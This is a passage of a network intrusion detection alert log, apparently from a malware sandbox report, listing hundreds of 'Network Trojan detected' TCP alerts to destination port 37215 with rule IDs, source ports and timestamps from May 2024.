            SID:2829579
            Source Port:48004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943694
            SID:2835222
            Source Port:60698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989669
            SID:2829579
            Source Port:50562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669917
            SID:2829579
            Source Port:50468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863564
            SID:2829579
            Source Port:45020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.950248
            SID:2835222
            Source Port:52594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.281084
            SID:2835222
            Source Port:35920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760343
            SID:2829579
            Source Port:46134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277037
            SID:2835222
            Source Port:57710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969214
            SID:2835222
            Source Port:49562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.740999
            SID:2829579
            Source Port:44008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918678
            SID:2829579
            Source Port:43218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432841
            SID:2835222
            Source Port:44430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575469
            SID:2835222
            Source Port:36800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707664
            SID:2829579
            Source Port:59980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368309
            SID:2835222
            Source Port:58232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834542
            SID:2829579
            Source Port:47394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.454285
            SID:2829579
            Source Port:35854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180652
            SID:2829579
            Source Port:60492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924885
            SID:2829579
            Source Port:48672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532503
            SID:2829579
            Source Port:59126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382068
            SID:2835222
            Source Port:41638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956441
            SID:2829579
            Source Port:36034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.712052
            SID:2835222
            Source Port:39012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875710
            SID:2829579
            Source Port:54634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309231
            SID:2829579
            Source Port:41420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396711
            SID:2829579
            Source Port:51066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469871
            SID:2829579
            Source Port:48000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507323
            SID:2829579
            Source Port:45200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507578
            SID:2829579
            Source Port:35216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.659770
            SID:2835222
            Source Port:40898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776380
            SID:2829579
            Source Port:46750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961471
            SID:2829579
            Source Port:47568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.798327
            SID:2835222
            Source Port:42746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756509
            SID:2829579
            Source Port:47454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703136
            SID:2835222
            Source Port:35266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058603
            SID:2829579
            Source Port:60712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611047
            SID:2829579
            Source Port:33334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299939
            SID:2835222
            Source Port:44572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777591
            SID:2829579
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663824
            SID:2835222
            Source Port:44108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500091
            SID:2835222
            Source Port:49262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015503
            SID:2835222
            Source Port:59054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423103
            SID:2835222
            Source Port:60270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066135
            SID:2829579
            Source Port:51340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953825
            SID:2835222
            Source Port:54100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846612
            SID:2829579
            Source Port:58272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930845
            SID:2835222
            Source Port:59180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.384734
            SID:2829579
            Source Port:42360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862686
            SID:2829579
            Source Port:45914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040193
            SID:2829579
            Source Port:51472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962847
            SID:2829579
            Source Port:37614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753143
            SID:2829579
            Source Port:53478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868363
            SID:2829579
            Source Port:44866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623422
            SID:2835222
            Source Port:47018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733694
            SID:2829579
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299451
            SID:2835222
            Source Port:35794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.528178
            SID:2835222
            Source Port:41494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.734433
            SID:2835222
            Source Port:33750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563296
            SID:2829579
            Source Port:56952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992479
            SID:2829579
            Source Port:50908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899396
            SID:2835222
            Source Port:48554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745761
            SID:2835222
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741882
            SID:2829579
            Source Port:44094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759532
            SID:2835222
            Source Port:60702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.065891
            SID:2835222
            Source Port:58986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812171
            SID:2829579
            Source Port:33998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979536
            SID:2829579
            Source Port:48634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760012
            SID:2829579
            Source Port:41292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931516
            SID:2835222
            Source Port:59802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849788
            SID:2835222
            Source Port:60088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935199
            SID:2829579
            Source Port:46196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943299
            SID:2829579
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847783
            SID:2835222
            Source Port:38252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855654
            SID:2835222
            Source Port:34668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811428
            SID:2835222
            Source Port:49016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832485
            SID:2829579
            Source Port:44910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943840
            SID:2835222
            Source Port:43314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316787
            SID:2829579
            Source Port:54428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953613
            SID:2835222
            Source Port:54814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617617
            SID:2829579
            Source Port:41162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386746
            SID:2835222
            Source Port:49622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873306
            SID:2829579
            Source Port:43110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735404
            SID:2829579
            Source Port:57880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919635
            SID:2829579
            Source Port:43950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833551
            SID:2829579
            Source Port:51312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077848
            SID:2835222
            Source Port:41734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990591
            SID:2829579
            Source Port:42974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777095
            SID:2835222
            Source Port:33728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.125912
            SID:2835222
            Source Port:50940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.994709
            SID:2835222
            Source Port:48750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755925
            SID:2835222
            Source Port:47636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715027
            SID:2835222
            Source Port:43292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962551
            SID:2829579
            Source Port:56848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052970
            SID:2835222
            Source Port:53816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.059919
            SID:2835222
            Source Port:46538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881823
            SID:2829579
            Source Port:44690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864657
            SID:2829579
            Source Port:46178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507783
            SID:2835222
            Source Port:42156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617432
            SID:2835222
            Source Port:38804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352135
            SID:2829579
            Source Port:39928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541669
            SID:2829579
            Source Port:49574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926323
            SID:2835222
            Source Port:52262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.305555
            SID:2835222
            Source Port:32772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756793
            SID:2829579
            Source Port:37776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911259
            SID:2835222
            Source Port:42682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541160
            SID:2829579
            Source Port:59596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670393
            SID:2835222
            Source Port:33330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293382
            SID:2835222
            Source Port:50094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556938
            SID:2835222
            Source Port:52114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.709975
            SID:2835222
            Source Port:35346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014144
            SID:2829579
            Source Port:38252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020537
            SID:2829579
            Source Port:39076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280040
            SID:2829579
            Source Port:33946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948090
            SID:2835222
            Source Port:56086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891566
            SID:2829579
            Source Port:41748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053993
            SID:2829579
            Source Port:58928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290735
            SID:2835222
            Source Port:52968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532913
            SID:2835222
            Source Port:36304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899771
            SID:2829579
            Source Port:51332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597453
            SID:2835222
            Source Port:56068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.792718
            SID:2829579
            Source Port:47184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.508185
            SID:2835222
            Source Port:46370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946106
            SID:2835222
            Source Port:59062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507433
            SID:2835222
            Source Port:52822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766776
            SID:2835222
            Source Port:35732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.983870
            SID:2835222
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376686
            SID:2829579
            Source Port:32988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855592
            SID:2835222
            Source Port:44488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880418
            SID:2835222
            Source Port:49298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998458
            SID:2835222
            Source Port:53302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885242
            SID:2835222
            Source Port:43122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014522
            SID:2835222
            Source Port:47770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650396
            SID:2829579
            Source Port:49100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278164
            SID:2835222
            Source Port:35792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.016046
            SID:2829579
            Source Port:40438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776796
            SID:2835222
            Source Port:40894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850663
            SID:2829579
            Source Port:36996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560713
            SID:2835222
            Source Port:51628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.402580
            SID:2829579
            Source Port:50726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.905136
            SID:2835222
            Source Port:39236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058408
            SID:2829579
            Source Port:54962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541874
            SID:2829579
            Source Port:42010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985490
            SID:2829579
            Source Port:43436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.622947
            SID:2829579
            Source Port:51894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804807
            SID:2835222
            Source Port:41454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776750
            SID:2835222
            Source Port:35772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575300
            SID:2835222
            Source Port:39372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304890
            SID:2829579
            Source Port:47626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779145
            SID:2829579
            Source Port:33540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811505
            SID:2829579
            Source Port:39576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048641
            SID:2835222
            Source Port:50064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846639
            SID:2835222
            Source Port:55240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039250
            SID:2835222
            Source Port:59204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505690
            SID:2835222
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334427
            SID:2835222
            Source Port:33316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823301
            SID:2835222
            Source Port:39232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582731
            SID:2835222
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.794087
            SID:2829579
            Source Port:45080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908606
            SID:2829579
            Source Port:53426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564942
            SID:2829579
            Source Port:48160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470592
            SID:2835222
            Source Port:40172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950704
            SID:2835222
            Source Port:51784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765538
            SID:2829579
            Source Port:48616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893915
            SID:2829579
            Source Port:39066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979520
            SID:2829579
            Source Port:60848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878610
            SID:2829579
            Source Port:38032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997936
            SID:2835222
            Source Port:42498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.548921
            SID:2829579
            Source Port:39798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676317
            SID:2829579
            Source Port:40916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078600
            SID:2829579
            Source Port:49302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.445860
            SID:2829579
            Source Port:45512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761453
            SID:2835222
            Source Port:60156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394502
            SID:2829579
            Source Port:48622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507665
            SID:2835222
            Source Port:58008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872225
            SID:2829579
            Source Port:55302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052452
            SID:2829579
            Source Port:46566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.805936
            SID:2829579
            Source Port:53926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568259
            SID:2829579
            Source Port:56528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855628
            SID:2835222
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068235
            SID:2829579
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445172
            SID:2835222
            Source Port:50034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543774
            SID:2835222
            Source Port:38998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825024
            SID:2835222
            Source Port:53600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309685
            SID:2829579
            Source Port:54610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040710
            SID:2829579
            Source Port:37606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754527
            SID:2829579
            Source Port:39356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996194
            SID:2835222
            Source Port:59900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349149
            SID:2835222
            Source Port:50206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510473
            SID:2835222
            Source Port:51902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047957
            SID:2835222
            Source Port:49924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.946852
            SID:2835222
            Source Port:42794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728318
            SID:2835222
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323220
            SID:2835222
            Source Port:57900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382125
            SID:2835222
            Source Port:55032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.110224
            SID:2829579
            Source Port:55036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707600
            SID:2829579
            Source Port:41816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.929879
            SID:2835222
            Source Port:57660
            Destination Port:37215
